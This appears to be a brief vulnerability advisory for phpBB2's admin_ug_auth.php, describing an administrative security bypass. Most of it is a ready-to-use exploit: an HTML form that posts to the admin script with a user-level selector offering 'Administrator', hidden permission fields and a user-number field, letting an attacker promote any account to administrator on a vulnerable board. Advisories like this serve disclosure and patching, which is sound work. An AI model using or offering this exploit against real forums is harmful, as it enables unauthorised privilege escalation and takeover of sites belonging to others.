PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability

PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability

Attackers can exploit this issue via a browser.

The following exploit POST request is available:

<html>
<head>
</head>
<body>

<form method="post"
action="www.example.com/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>